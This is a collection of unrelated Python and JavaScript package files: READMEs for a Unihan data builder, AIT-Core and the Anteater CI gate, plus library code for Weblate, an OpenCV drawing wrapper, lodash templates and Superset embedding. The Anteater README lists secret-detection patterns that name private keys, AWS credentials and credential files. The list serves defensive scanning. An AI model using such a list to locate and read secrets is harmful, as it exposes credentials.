|pypi| |docs| |build-status| |coverage| |license|
Unihan's data is disperved across multiple files in the format of::
U+3400 kCantonese jau1
U+3400 kDefinition (same as U+4E18 丘) hillock or mound
U+3400 kMandarin qiū
U+3401 kCantonese tim2
U+3401 kDefinition to lick; to taste, a mat, bamboo bark
U+3401 kHanyuPinyin 10019.020:tiàn
U+3401 kMandarin tiàn
``cihaidata_unihan/process.py`` will download Unihan.zip and build all files into a
single tabular CSV (default output: ``./data/unihan.csv``)::
char,ucn,kCantonese,kDefinition,kHanyuPinyin,kMandarin
丘,U+3400,jau1,(same as U+4E18 丘) hillock or mound,,qiū
㐁,U+3401,tim2,"to lock; to taste, a mat, bamboo bark",10019.020:"tiàn,tiàn"
``process.py`` supports command line arguments. See `cihaidata_unihan/process.py CLI
arguments`_ for information on how you can specify custom columns, files,
download URL's and output destinations.
Being built against unit tests. See the `Travis Builds`_ and
`Revision History`_.
.. _cihai: https://cihai.git-pull.com
.. _cihai-handbook: https://github.com/cihai/cihai-handbook
.. _cihai team: https://github.com/cihai?tab=members
.. _cihai-python: https://github.com/cihai/cihai-python
.. _cihaidata-unihan on github: https://github.com/cihai/cihaidata-unihan
Usage
-----
To download and build your own ``unihan.csv``:
.. code-block:: bash
$ ./cihaidata_unihan/process.py
Creates ``data/unihan.csv``.
See `cihaidata_unihan/process.py CLI arguments`_ for advanced usage examples.
.. _cihaidata_unihan/process.py CLI arguments: http://cihaidata-unihan.readthedocs.org/en/latest/cli.html
Structure
---------
.. code-block:: bash
# dataset metadata, schema information.
datapackage.json
# (future) when this package is stable, unihan.csv will be provided
data/unihan.csv
# stores downloaded Unihan.zip and it's txt file contents (.gitignore'd)
data/build_files/
# script to download + build a SDF csv of unihan.
cihaidata_unihan/process.py
# unit tests to verify behavior / consistency of builder
tests/*
# python 2/3 compatibility modules
cihaidata_unihan/_compat.py
cihaidata_unihan/unicodecsv.py
# python module, public-facing python API.
__init__.py
cihaidata_unihan/__init__.py
# utility / helper functions
cihaidata_unihan/util.py
Cihai is *not* required for:
- ``data/unihan.csv`` - `simple data format`_ compatible csv file.
- ``cihaidata_unihan/process.py`` - create a ``data/unihan.csv``.
When this module is stable, ``data/unihan.csv`` will have prepared
releases, without requires using ``cihaidata_unihan/process.py``. ``process.py``
will not require external libraries.
Examples
--------
- https://github.com/datasets/gdp
- https://github.com/datasets/country-codes
Related links:
- CSV *Simple Data Format* (SDF): http://data.okfn.org/standards/simple-data-format
- Tools: http://data.okfn.org/tools
.. _Travis Builds: https://travis-ci.org/cihai/cihaidata-unihan/builds
.. _Revision History: https://github.com/cihai/cihaidata-unihan/commits/master
.. _cjklib: http://cjklib.org/0.3/
.. _current datasets: http://cihai.readthedocs.org/en/latest/api.html#datasets
.. _permissively licensing your dataset: http://cihai.readthedocs.org/en/latest/information_liberation.html
============== ==========================================================
Python support Python 2.7, >= 3.3, pypy/pypy3
Source https://github.com/cihai/cihaidata-unihan
Docs https://cihaidata-unihan.git-pull.com
Changelog https://cihaidata-unihan.git-pull.com/en/latest/history.html
API https://cihaidata-unihan.git-pull.com/en/latest/api.html
Issues https://github.com/cihai/cihaidata-unihan/issues
Travis https://travis-ci.org/cihai/cihaidata-unihan
Test coverage https://codecov.io/gh/cihai/cihaidata-unihan
pypi https://pypi.python.org/pypi/cihaidata-unihan
OpenHub https://www.openhub.net/p/cihaidata-unihan
License `MIT`_.
git repo .. code-block:: bash
$ git clone https://github.com/cihai/cihaidata-unihan.git
install dev .. code-block:: bash
$ git clone https://github.com/cihai/cihaidata-unihan.git cihai
$ cd ./cihai
$ virtualenv .env
$ source .env/bin/activate
$ pip install -e .
tests .. code-block:: bash
$ python setup.py test
============== ==========================================================
.. _MIT: http://opensource.org/licenses/MIT
.. _Documentation: http://cihai.readthedocs.org/en/latest/
.. _API: http://cihai.readthedocs.org/en/latest/api.html
.. _Unihan: http://www.unicode.org/charts/unihan.html
.. _datapackages: http://dataprotocols.org/data-packages/
.. _datapackage.json format: https://github.com/datasets/gdp/blob/master/datapackage.json
.. _json table schema: http://dataprotocols.org/json-table-schema/
.. _simple data format: http://data.okfn.org/standards/simple-data-format
.. _cihai dataset API: http://cihai.readthedocs.org/en/latest/extending.html
.. _PEP 301\: python package format: http://www.python.org/dev/peps/pep-0301/
.. |pypi| image:: https://img.shields.io/pypi/v/cihaidata-unihan.svg
:alt: Python Package
:target: http://badge.fury.io/py/cihaidata-unihan
.. |build-status| image:: https://img.shields.io/travis/cihai/cihaidata-unihan.svg
:alt: Build Status
:target: https://travis-ci.org/cihai/cihaidata-unihan
.. |coverage| image:: https://codecov.io/gh/cihai/cihaidata-unihan/branch/master/graph/badge.svg
:alt: Code Coverage
:target: https://codecov.io/gh/cihai/cihaidata-unihan
.. |license| image:: https://img.shields.io/github/license/cihai/cihaidata-unihan.svg
:alt: License
.. |docs| image:: https://readthedocs.org/projects/cihaidata-unihan/badge/?version=latest
:alt: Documentation Status
:scale: 100%
:target: https://readthedocs.org/projects/cihaidata-unihan/
| PypiClean |
/B9gemyaeix-4.14.1.tar.gz/B9gemyaeix-4.14.1/weblate/checks/utils.py |
from pygments.lexers.markup import RstLexer
from pygments.token import Token
from weblate.checks.models import CHECKS
def highlight_pygments(source: str, unit):
"""
Highlight syntax characters using pygments.
This is not really a full syntax highlighting, we're only interested in
non-translatable strings.
"""
if "rst-text" in unit.all_flags:
lexer = RstLexer(stripnl=False)
start = 0
for token, text in lexer.get_tokens(source):
if token == Token.Literal.String:
if text[0] == "`" and text != "`_":
yield ((start, start + 1, "`"))
else:
yield ((start, start + len(text), text))
elif token == Token.Literal.String.Interpol:
yield ((start, start + len(text), text))
elif token == Token.Generic.Strong:
end = start + len(text)
yield (start, start + 2, "**")
yield (end - 2, end, "**")
elif token == Token.Generic.Emph:
end = start + len(text)
yield (start, start + 1, "*")
yield (end - 1, end, "*")
start += len(text)
def highlight_string(source: str, unit, hightlight_syntax: bool = False):
"""Return highlights for a string."""
if unit is None:
return []
highlights = []
for check in CHECKS:
if not CHECKS[check].target:
continue
highlights.extend(CHECKS[check].check_highlight(source, unit))
if hightlight_syntax:
highlights.extend(highlight_pygments(source, unit))
# Remove empty strings
highlights = [highlight for highlight in highlights if highlight[2]]
# Sort by order in string
highlights.sort(key=lambda x: x[0])
# Remove overlapping ones
for hl_idx in range(0, len(highlights)):
if hl_idx >= len(highlights):
break
elref = highlights[hl_idx]
for hl_idx_next in range(hl_idx + 1, len(highlights)):
if hl_idx_next >= len(highlights):
break
eltest = highlights[hl_idx_next]
if eltest[0] >= elref[0] and eltest[0] < elref[1]:
# Elements overlap, remove inner one
highlights.pop(hl_idx_next)
elif eltest[0] > elref[1]:
# This is not an overlapping element
break
return highlights | PypiClean |
/cv3-beta-1.2.0.tar.gz/cv3-beta-1.2.0/cv3/draw.py | import cv2
import warnings
import numpy as np
from typing import List
from . import opt
from ._utils import (
type_decorator,
_relative_check,
_relative_handle,
_process_color,
_handle_rect_coords,
COLORS_RGB_DICT
)
__all__ = [
'rectangle',
'polylines',
'fill_poly',
'circle',
'point',
'points',
'line', 'hline', 'vline',
'text', 'putText',
'rectangles',
'COLORS'
]
COLORS = list(COLORS_RGB_DICT)
_LINE_TYPE_DICT = {
'filled': cv2.FILLED,
'line_4': cv2.LINE_4,
'line_8': cv2.LINE_8,
'line_aa': cv2.LINE_AA
}
def _line_type_flag_match(flag):
assert flag in _LINE_TYPE_DICT, f'no such flag: "{flag}". Available: {", ".join(_LINE_TYPE_DICT.keys())}'
return _LINE_TYPE_DICT[flag]
_FONTS_DICT = {
'simplex': cv2.FONT_HERSHEY_SIMPLEX,
'plain': cv2.FONT_HERSHEY_PLAIN,
'duplex': cv2.FONT_HERSHEY_DUPLEX,
'complex': cv2.FONT_HERSHEY_COMPLEX,
'triplex': cv2.FONT_HERSHEY_TRIPLEX,
'complex_small': cv2.FONT_HERSHEY_COMPLEX_SMALL,
'script_simplex': cv2.FONT_HERSHEY_SCRIPT_SIMPLEX,
'script_complex': cv2.FONT_HERSHEY_SCRIPT_COMPLEX,
'italic': cv2.FONT_ITALIC
}
def _font_flag_match(flag):
assert flag in _FONTS_DICT, f'no such flag: "{flag}". Available: {", ".join(_FONTS_DICT.keys())}'
return _FONTS_DICT[flag]
def _draw_decorator(func):
@type_decorator
def wrapper(img, *args, color=None, line_type=cv2.LINE_8, copy=False, **kwargs):
if copy:
img = img.copy()
color = _process_color(color)
if isinstance(line_type, str):
line_type = _line_type_flag_match(line_type)
kwargs['t'] = round(kwargs.get('t', opt.THICKNESS))
return func(img, *args, color=color, line_type=line_type, **kwargs)
return wrapper
# TODO filled=False
@_draw_decorator
def rectangle(img, x0, y0, x1, y1, mode='xyxy', rel=None, **kwargs):
x0, y0, x1, y1 = _handle_rect_coords(img, x0, y0, x1, y1, mode=mode, rel=rel)
cv2.rectangle(img, (x0, y0), (x1, y1), kwargs['color'], kwargs['t'], lineType=kwargs['line_type'])
return img
def _handle_poly_pts(img, pts, rel=None):
pts = np.array(pts).reshape(-1)
pts = _relative_handle(img, *pts, rel=rel)
pts = np.int32(pts).reshape(-1, 1, 2)
return pts
@_draw_decorator
def polylines(img, pts, is_closed=False, rel=None, **kwargs):
"""
:param img:
:param pts: np.array or List[List] ot Tuple[Tuple]
:param is_closed: bool
:return:
"""
pts = _handle_poly_pts(img, pts, rel=rel)
cv2.polylines(img, [pts], is_closed, kwargs['color'], kwargs['t'], lineType=kwargs['line_type'])
return img
@_draw_decorator
def fill_poly(img, pts, rel=None, **kwargs):
"""
:param img:
:param pts: np.array or List[List] ot Tuple[Tuple]
:return:
"""
pts = _handle_poly_pts(img, pts, rel=rel)
cv2.fillPoly(img, [pts], kwargs['color'])
return img
@_draw_decorator
def circle(img, x0, y0, r, rel=None, **kwargs):
x0, y0 = _relative_handle(img, x0, y0, rel=rel)
r = round(r)
cv2.circle(img, (x0, y0), r, kwargs['color'], kwargs['t'], lineType=kwargs['line_type'])
return img
def point(img, x0, y0, r=None, rel=None, **kwargs):
if 't' in kwargs:
kwargs.pop('t')
warnings.warn('Parameter `t` is not used')
if r is None:
r = opt.PT_RADIUS
return circle(img, x0, y0, r, t=-1, rel=rel, **kwargs)
@_draw_decorator
def line(img, x0, y0, x1, y1, rel=None, **kwargs):
x0, y0, x1, y1 = _relative_handle(img, x0, y0, x1, y1, rel=rel)
cv2.line(img, (x0, y0), (x1, y1), kwargs['color'], kwargs['t'], lineType=kwargs['line_type'])
return img
@_draw_decorator
def hline(img, y, rel=None, **kwargs):
h, w = img.shape[:2]
y = round(y * h if _relative_check(y, rel=rel) else y)
cv2.line(img, (0, y), (w, y), kwargs['color'], kwargs['t'], lineType=kwargs['line_type'])
return img
@_draw_decorator
def vline(img, x, rel=None, **kwargs):
h, w = img.shape[:2]
x = round(x * w if _relative_check(x, rel=rel) else x)
cv2.line(img, (x, 0), (x, h), kwargs['color'], kwargs['t'], lineType=kwargs['line_type'])
return img
@_draw_decorator
def text(img, text, x=0.5, y=0.5, font=None, scale=None, flip=False, rel=None, **kwargs):
if font is None:
font = opt.FONT
elif isinstance(font, str):
font = _font_flag_match(font)
scale = scale or opt.SCALE
x, y = _relative_handle(img, x, y, rel=rel)
cv2.putText(
img,
str(text),
(x, y),
fontFace=font,
fontScale=scale,
color=kwargs['color'],
thickness=kwargs['t'],
lineType=kwargs['line_type'],
bottomLeftOrigin=flip
)
return img
@type_decorator
def rectangles(img: np.array, rects: List[List], **kwargs) -> np.array:
for rect in rects:
img = rectangle(img, *rect, **kwargs)
return img
@type_decorator
def points(img: np.array, pts: List[List], **kwargs) -> np.array:
for pt in pts:
img = point(img, *pt, **kwargs)
return img
putText = text | PypiClean |
/xnni-0.7.4-py3-none-manylinux1_x86_64.whl/xnni-0.7.4.data/data/nni/node_modules/lodash/template.js | var assignInWith = require('./assignInWith'),
attempt = require('./attempt'),
baseValues = require('./_baseValues'),
customDefaultsAssignIn = require('./_customDefaultsAssignIn'),
escapeStringChar = require('./_escapeStringChar'),
isError = require('./isError'),
isIterateeCall = require('./_isIterateeCall'),
keys = require('./keys'),
reInterpolate = require('./_reInterpolate'),
templateSettings = require('./templateSettings'),
toString = require('./toString');
/** Used to match empty string literals in compiled template source. */
var reEmptyStringLeading = /\b__p \+= '';/g,
reEmptyStringMiddle = /\b(__p \+=) '' \+/g,
reEmptyStringTrailing = /(__e\(.*?\)|\b__t\)) \+\n'';/g;
/**
* Used to match
* [ES template delimiters](http://ecma-international.org/ecma-262/7.0/#sec-template-literal-lexical-components).
*/
var reEsTemplate = /\$\{([^\\}]*(?:\\.[^\\}]*)*)\}/g;
/** Used to ensure capturing order of template delimiters. */
var reNoMatch = /($^)/;
/** Used to match unescaped characters in compiled string literals. */
var reUnescapedString = /['\n\r\u2028\u2029\\]/g;
/**
* Creates a compiled template function that can interpolate data properties
* in "interpolate" delimiters, HTML-escape interpolated data properties in
* "escape" delimiters, and execute JavaScript in "evaluate" delimiters. Data
* properties may be accessed as free variables in the template. If a setting
* object is given, it takes precedence over `_.templateSettings` values.
*
* **Note:** In the development build `_.template` utilizes
* [sourceURLs](http://www.html5rocks.com/en/tutorials/developertools/sourcemaps/#toc-sourceurl)
* for easier debugging.
*
* For more information on precompiling templates see
* [lodash's custom builds documentation](https://lodash.com/custom-builds).
*
* For more information on Chrome extension sandboxes see
* [Chrome's extensions documentation](https://developer.chrome.com/extensions/sandboxingEval).
*
* @static
* @since 0.1.0
* @memberOf _
* @category String
* @param {string} [string=''] The template string.
* @param {Object} [options={}] The options object.
* @param {RegExp} [options.escape=_.templateSettings.escape]
* The HTML "escape" delimiter.
* @param {RegExp} [options.evaluate=_.templateSettings.evaluate]
* The "evaluate" delimiter.
* @param {Object} [options.imports=_.templateSettings.imports]
* An object to import into the template as free variables.
* @param {RegExp} [options.interpolate=_.templateSettings.interpolate]
* The "interpolate" delimiter.
* @param {string} [options.sourceURL='templateSources[n]']
* The sourceURL of the compiled template.
* @param {string} [options.variable='obj']
* The data object variable name.
* @param- {Object} [guard] Enables use as an iteratee for methods like `_.map`.
* @returns {Function} Returns the compiled template function.
* @example
*
* // Use the "interpolate" delimiter to create a compiled template.
* var compiled = _.template('hello <%= user %>!');
* compiled({ 'user': 'fred' });
* // => 'hello fred!'
*
* // Use the HTML "escape" delimiter to escape data property values.
* var compiled = _.template('<b><%- value %></b>');
* compiled({ 'value': '<script>' });
* // => '<b><script></b>'
*
* // Use the "evaluate" delimiter to execute JavaScript and generate HTML.
* var compiled = _.template('<% _.forEach(users, function(user) { %><li><%- user %></li><% }); %>');
* compiled({ 'users': ['fred', 'barney'] });
* // => '<li>fred</li><li>barney</li>'
*
* // Use the internal `print` function in "evaluate" delimiters.
* var compiled = _.template('<% print("hello " + user); %>!');
* compiled({ 'user': 'barney' });
* // => 'hello barney!'
*
* // Use the ES template literal delimiter as an "interpolate" delimiter.
* // Disable support by replacing the "interpolate" delimiter.
* var compiled = _.template('hello ${ user }!');
* compiled({ 'user': 'pebbles' });
* // => 'hello pebbles!'
*
* // Use backslashes to treat delimiters as plain text.
* var compiled = _.template('<%= "\\<%- value %\\>" %>');
* compiled({ 'value': 'ignored' });
* // => '<%- value %>'
*
* // Use the `imports` option to import `jQuery` as `jq`.
* var text = '<% jq.each(users, function(user) { %><li><%- user %></li><% }); %>';
* var compiled = _.template(text, { 'imports': { 'jq': jQuery } });
* compiled({ 'users': ['fred', 'barney'] });
* // => '<li>fred</li><li>barney</li>'
*
* // Use the `sourceURL` option to specify a custom sourceURL for the template.
* var compiled = _.template('hello <%= user %>!', { 'sourceURL': '/basic/greeting.jst' });
* compiled(data);
* // => Find the source of "greeting.jst" under the Sources tab or Resources panel of the web inspector.
*
* // Use the `variable` option to ensure a with-statement isn't used in the compiled template.
* var compiled = _.template('hi <%= data.user %>!', { 'variable': 'data' });
* compiled.source;
* // => function(data) {
* // var __t, __p = '';
* // __p += 'hi ' + ((__t = ( data.user )) == null ? '' : __t) + '!';
* // return __p;
* // }
*
* // Use custom template delimiters.
* _.templateSettings.interpolate = /{{([\s\S]+?)}}/g;
* var compiled = _.template('hello {{ user }}!');
* compiled({ 'user': 'mustache' });
* // => 'hello mustache!'
*
* // Use the `source` property to inline compiled templates for meaningful
* // line numbers in error messages and stack traces.
* fs.writeFileSync(path.join(process.cwd(), 'jst.js'), '\
* var JST = {\
* "main": ' + _.template(mainText).source + '\
* };\
* ');
*/
function template(string, options, guard) {
// Based on John Resig's `tmpl` implementation
// (http://ejohn.org/blog/javascript-micro-templating/)
// and Laura Doktorova's doT.js (https://github.com/olado/doT).
var settings = templateSettings.imports._.templateSettings || templateSettings;
if (guard && isIterateeCall(string, options, guard)) {
options = undefined;
}
string = toString(string);
options = assignInWith({}, options, settings, customDefaultsAssignIn);
var imports = assignInWith({}, options.imports, settings.imports, customDefaultsAssignIn),
importsKeys = keys(imports),
importsValues = baseValues(imports, importsKeys);
var isEscaping,
isEvaluating,
index = 0,
interpolate = options.interpolate || reNoMatch,
source = "__p += '";
// Compile the regexp to match each delimiter.
var reDelimiters = RegExp(
(options.escape || reNoMatch).source + '|' +
interpolate.source + '|' +
(interpolate === reInterpolate ? reEsTemplate : reNoMatch).source + '|' +
(options.evaluate || reNoMatch).source + '|$'
, 'g');
// Use a sourceURL for easier debugging.
var sourceURL = 'sourceURL' in options ? '//# sourceURL=' + options.sourceURL + '\n' : '';
string.replace(reDelimiters, function(match, escapeValue, interpolateValue, esTemplateValue, evaluateValue, offset) {
interpolateValue || (interpolateValue = esTemplateValue);
// Escape characters that can't be included in string literals.
source += string.slice(index, offset).replace(reUnescapedString, escapeStringChar);
// Replace delimiters with snippets.
if (escapeValue) {
isEscaping = true;
source += "' +\n__e(" + escapeValue + ") +\n'";
}
if (evaluateValue) {
isEvaluating = true;
source += "';\n" + evaluateValue + ";\n__p += '";
}
if (interpolateValue) {
source += "' +\n((__t = (" + interpolateValue + ")) == null ? '' : __t) +\n'";
}
index = offset + match.length;
// The JS engine embedded in Adobe products needs `match` returned in
// order to produce the correct `offset` value.
return match;
});
source += "';\n";
// If `variable` is not specified wrap a with-statement around the generated
// code to add the data object to the top of the scope chain.
var variable = options.variable;
if (!variable) {
source = 'with (obj) {\n' + source + '\n}\n';
}
// Cleanup code by stripping empty strings.
source = (isEvaluating ? source.replace(reEmptyStringLeading, '') : source)
.replace(reEmptyStringMiddle, '$1')
.replace(reEmptyStringTrailing, '$1;');
// Frame code as the function body.
source = 'function(' + (variable || 'obj') + ') {\n' +
(variable
? ''
: 'obj || (obj = {});\n'
) +
"var __t, __p = ''" +
(isEscaping
? ', __e = _.escape'
: ''
) +
(isEvaluating
? ', __j = Array.prototype.join;\n' +
"function print() { __p += __j.call(arguments, '') }\n"
: ';\n'
) +
source +
'return __p\n}';
var result = attempt(function() {
return Function(importsKeys, sourceURL + 'return ' + source)
.apply(undefined, importsValues);
});
// Provide the compiled function's source by its `toString` method or
// the `source` property as a convenience for inlining compiled templates.
result.source = source;
if (isError(result)) {
throw result;
}
return result;
}
module.exports = template; | PypiClean |
/superset-2.0.0-custom-test-0.0.1.tar.gz/superset-2.0.0-custom-test-0.0.1/superset/embedded/view.py | import json
from typing import Callable
from flask import abort
from flask_appbuilder import expose
from flask_login import AnonymousUserMixin, LoginManager
from superset import event_logger, is_feature_enabled, security_manager
from superset.embedded.dao import EmbeddedDAO
from superset.superset_typing import FlaskResponse
from superset.utils import core as utils
from superset.views.base import BaseSupersetView, common_bootstrap_payload
class EmbeddedView(BaseSupersetView):
"""The views for embedded resources to be rendered in an iframe"""
route_base = "/embedded"
@expose("/<uuid>")
@event_logger.log_this_with_extra_payload
def embedded(
self,
uuid: str,
add_extra_log_payload: Callable[..., None] = lambda **kwargs: None,
) -> FlaskResponse:
"""
Server side rendering for the embedded dashboard page
:param uuid: identifier for embedded dashboard
:param add_extra_log_payload: added by `log_this_with_manual_updates`, set a
default value to appease pylint
"""
if not is_feature_enabled("EMBEDDED_SUPERSET"):
abort(404)
embedded = EmbeddedDAO.find_by_id(uuid)
if not embedded:
abort(404)
# Log in as an anonymous user, just for this view.
# This view needs to be visible to all users,
# and building the page fails if g.user and/or ctx.user aren't present.
login_manager: LoginManager = security_manager.lm
login_manager.reload_user(AnonymousUserMixin())
add_extra_log_payload(
embedded_dashboard_id=uuid,
dashboard_version="v2",
)
bootstrap_data = {
"common": common_bootstrap_payload(),
"embedded": {
"dashboard_id": embedded.dashboard_id,
},
}
return self.render_template(
"superset/spa.html",
entry="embedded",
bootstrap_data=json.dumps(
bootstrap_data, default=utils.pessimistic_json_iso_dttm_ser
),
) | PypiClean |
/ait_core-2.5.0.tar.gz/ait_core-2.5.0/README.rst |
.. image:: https://github.com/NASA-AMMOS/AIT-Core/actions/workflows/full_build.yaml/badge.svg?branch=master
:target: https://github.com/NASA-AMMOS/AIT-Core/actions
:alt: Build and Lint Status
.. image:: https://readthedocs.org/projects/ait-core/badge/?version=latest
:target: https://ait-core.readthedocs.io/en/latest/?badge=latest
:alt: Documentation Status
The AMMOS Instrument Toolkit (Formerly the Bespoke Links to Instruments
for Surface and Space (BLISS)) is a Python-based software suite
developed to handle Ground Data System (GDS), Electronic Ground Support
Equipment (EGSE), commanding, telemetry uplink/downlink, and sequencing
for instrument and CubeSat Missions. It is a generalization and expansion
of tools developed for a number of ISS
missions.
Getting Started
===============
You can read through the `Installation and Configuration
Page <http://ait-core.readthedocs.io/en/latest/installation.html>`__ for
instruction on how to install AIT Core.
You can read through the `New Project Setup
Page <http://ait-core.readthedocs.io/en/latest/project_setup.html>`__
for instructions on how to use AIT on your next project.
Join the Community
==================
The project's `User and Developer Mailing List <https://groups.google.com/forum/#!forum/ait-dev>`__ is the best way to communicate with the team, ask questions, brainstorm plans for future changes, and help contribute to the project.
This project exists thanks to the dedicated users, contributors, committers, and project management committee members. If you'd like to learn more about how the project is organized and how to become a part of the team please check out the `Project Structure and Governance <https://github.com/NASA-AMMOS/AIT-Core/wiki/Project-Structure-and-Governance>`__ documentation.
Contributing
============
Thank you for your interest in contributing to AIT! We welcome contributions from people of all backgrounds and disciplines. While much of the focus of our project is software, we believe that many of the most critical contributions come in the form of documentation improvements, asset generation, user testing and feedback, and community involvement. So if you're interested and want to help out please don't hesitate! Send us an email on the public mailing list below, introduce yourself, and join the community.
Communication
-------------
All project communication happens via mailing lists. Discussions related to development should happen on the public `Developer and User Mailing List <https://groups.google.com/forum/#!forum/ait-dev>`__. If you're new to the community make sure to introduce yourself as well!
Dev Installation
----------------
As always, we encourage you to install AIT into a virtual environment of your choosing when you set up your development environment. AIT uses `poetry` for package management. Before setting up your development environment you will need the following installed and ready to use:
- A virtual environment "manager" of your choosing with a configured and activated virtual environment. Since AIT uses `poetry` you can consider leveraging its `environment management <https://python-poetry.org/docs/managing-environments/>`__ functionality as well.
- Using `poetry shell` is also very convenient for development testing and simplifying environment management. You should make sure to install the package into the shell to get access to the development dependencies as well. It's recommended that you use `poetry shell` when running the tox builds because other virtual environment managers will often prevent tox from accessing `pyenv`-installed Python versions.
- `pyenv <https://github.com/pyenv/pyenv>`__ so you can easily install different Python versions
- `poetry <https://python-poetry.org/docs/#installation>`__ installed either to your specific virtual environment or system-wide, whichever you prefer.
Install the package in "editable" mode with all the development dependencies by running the following::
poetry install
As with a normal installation you will need to point `AIT_CONFIG` at the primary configuration file. You should consider saving this in your shell RC file or your virtual environment configuration files so you don't have to reset with every new shell::
export AIT_CONFIG=/path/to/ait-core/config/config.yaml
You should configure `pre-commit` by running the following. This will install our pre-commit and pre-push hooks::
pre-commit install && pre-commit install -t pre-push
Finally, you should install the different Python versions that the project supports so they're accessible to `tox`. Using `pyenv` is the easiest way to accomplish this::
cat .python-version | xargs -I{} pyenv install --skip-existing {}
Dev Tools
---------
Tox
~~~
Use `tox` to run a thorough build of the toolkit that checks test execution across different Python versions, verifies the docs build, runs the linting pipeline, and checks that the repo packages cleanly. Make sure you run `tox` in Poetry's `shell` without another virtual environment active to avoid problems with `tox` finding different python versions for the tests. You can run all of the development tools with::
tox
You can see the available `tox` test environments by passing `-l` and execute a specific one by passing its name to `-e`. Run `tox -h` for more info.
Tests
~~~~~
Use `pytest` to manually run the test suite::
pytest
Or via `tox` for a specific python version::
tox -e py310
Code Checks
~~~~~~~~~~~
We run ``black``, ``flake8``, ``mypy``, and a few other minor checkers on the code base. Our linting and code check pipeline is run whenever you commit or push. If you'd like to run it manually you can do so with the following::
pre_commit run --color=always {posargs:--all}
Individual calls to the tools are configured in ``.pre-commit-config.yaml``. If you'd like to run a specific tool on its own you can see how we call them there.
You can run all the linting tools with tox as well::
tox -e lint
Documentation
~~~~~~~~~~~~~
AIT uses Sphinx to build its documentation. You can build the documentation with::
poetry run build_sphinx
To view the documentation, open ``doc/build/html/index.html`` in a web browser. If you just want to check that the docs build is working you can use tox::
tox -e docs
If you need to update the auto-generated documentation you can run the following command to rebuild all of the package documentation::
sphinx-apidoc --separate --force --no-toc -o doc/source ait --implicit-namespaces
Please make sure to update the docs if changes in a ticket result in the documentation being out of date.
Project Workflow
----------------
Issue Tracking
~~~~~~~~~~~~~~
All changes need to be made against one or more tickets for tracking purposes. AIT uses GitHub Issues along with Zenhub to track issue in the project. All tickets should have (outside of rare edge-cases):
- A concise title
- An in-depth description of the problem / request. If reporting a bug, the description should include information on how to reproduce the bug. Also include the version of the code where you’re seeing the bug.
If you’re going to begin work on a ticket make sure to progress the ticket through the various Pipeline steps as appropriate as well as assigning yourself as an Assignee. If you lack sufficient permissions to do so you can post on the ticket asking for the above to be done for you.
Commit Messages
~~~~~~~~~~~~~~~
AIT projects take a fairly standard approach to commit message formatting. You can checkout Tim Pope's blog for a good starting point to figuring out how to format your commit messages. All commit messages should reference a ticket in their title / summary line::
Issue #248 - Show an example commit message title
This makes sure that tickets are updated on GitHub with references to commits that are related to them.
Commit should always be atomic. Keep solutions isolated whenever possible. Filler commits such as "clean up white space" or "fix typo" should be rebased out before making a pull request. Please ensure your commit history is clean and meaningful!
Code Formatting and Style
~~~~~~~~~~~~~~~~~~~~~~~~~
AIT makes a best-effort attempt at sticking with PEP-8 conventions. This is enforced automatically by ``black`` and checked by ``flake8``. You should run the ``pre-commit`` linting pipeline on any changes you make.
Testing
~~~~~~~
We do our best to make sure that all of our changes are tested. If you're fixing a bug you should always have an accompanying unit test to ensure we don't regress!
Check the Developer Tips section below for information on running each repository's test suite.
Pull Requests and Feature Branches
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
All changes should be isolated to a feature branch that links to a ticket. The standard across AIT projects is to use issue-### for branch names where ### is the issue number found on GitHub.
The title of a pull request should include a reference to the ticket being fixed as mentioned for commit messages. The description of a pull request should provide an in-depth explanation of the changes present. Note, if you wrote good commit messages this step should be easy!
Any tickets that are resolved by the pull request should be referenced with GitHub's syntax for closing out tickets. Assuming the above ticket we would have the following in a pull request description:
Changes are required to be reviewed by at least one member of the AIT PMC/Committers groups, tests must pass, and the branch must be up to date with master before changes will be merged. If changes are made as part of code review please ensure your commit history is cleaned up.
Resolve #248
--------------
| PypiClean |
/anteater-0.23.tar.gz/anteater-0.23/README.md | # Anteater - CI/CD Gate Check Framework

[](https://travis-ci.org/anteater/anteater)
[](http://anteater.readthedocs.io/en/latest/?badge=latest)
Description
-----------
Anteater is an open framework to prevent the unwanted merging of nominated strings,
filenames, binaries, depreciated functions, staging enviroment code / credentials
etc. Anything that can be specified with regular expression syntax, can be
sniffed out by anteater.
You tell anteater exactly what you don't want to get merged, and anteater looks
after the rest.
If anteater finds something, it exits with a non-zero code which in turn fails
the build of your CI tool, with the idea that it would prevent a pull request
merging. Any false positives are easily negated by using the
same RegExp framework to cancel out the false match.
Entire projects may also be scanned also, using a recursive directory walk.
With a few simple steps it can be easily implemented into a CI / CD workflow
with tooling such as [Travis CI](https://travis-ci.org/), [CircleCI](https://circleci.com/), [Gitlab CI/CD](https://about.gitlab.com/features/gitlab-ci-cd/) and [Jenkins](https://jenkins.io/).
It is currently used in the Linux Foundations project ['OPNFV'](https://opnfv.org)
as means to provide automated security checks at gate, but as shown in the
examples below, it can be used for other scenarios.
Anteater also provides integrates with the Virus Total API, so any binaries,
public IP addresses or URL's found by anteater, will be sent to the Virus Total
API and a report will be returned. If any object is reported as malicous,
it will fail the CI build job.
Example content is provided for those unsure of what to start with and its
encouraged and welcomed to share any Anteater filter strings you find useful.
Why would I want to use this?
-----------------------------
Anteater has many uses, and can easily be bent to cover your own specific needs.
First, as mentioned, it can be set up to block strings and files with a
potential security impact or risk. This could include private keys, a shell
history, aws credentials etc.
It is especially useful at ensuring that elements used in a staging /
development enviroment don't find there way into a production enviroment.
Let's take a look at some examples:
```
apprun:
regex: app\.run\s*\(.*debug.*=.*True.*\)
desc: "Running flask in debug mode could potentially leak sensitive data"
```
The above will match code where a flask server is set to running in debug mode
`` app.run(host='0.0.0.0' port=80 debug=true)``, which can be typical to a
developers enviroment and mistakenly staged into production.
For a rails app, this could be:
`` regex: \<%=.*debug.*%>``
Even more simple, look for the following in most logging frameworks:
`` regex: log\.debug``
Need to stop developers mistakenly adding a private key?
```
private_key:
regex: -----BEGIN\sRSA\sPRIVATE\sKEY----
desc: "This looks like it could be a private key"
```
How about credential files that would cause a job loss if ever leaked into
production? Anteater works with file names too.
For Example:
``jenkins\.plugins\.publish_over_ssh\.BapSshPublisherPlugin\.xml``
Or even..
```
- \.pypirc
- \.gem\/credentials
- aws_access_key_id
- aws_secret_access_key
- LocalSettings\.php
```
If your app has its own custom secrets / config file, then its very easy to
add your own regular expressions. Everything is set using YAML formatting,
so no need to change anteaters code.
Depreciated functions, classes etc
----------------------------------
Another use is for when a project depreciates an old function, yet developers
might still make pull requests using the old function naming:
```
depreciated_function:``
regex: depreciated_function\(.*\)
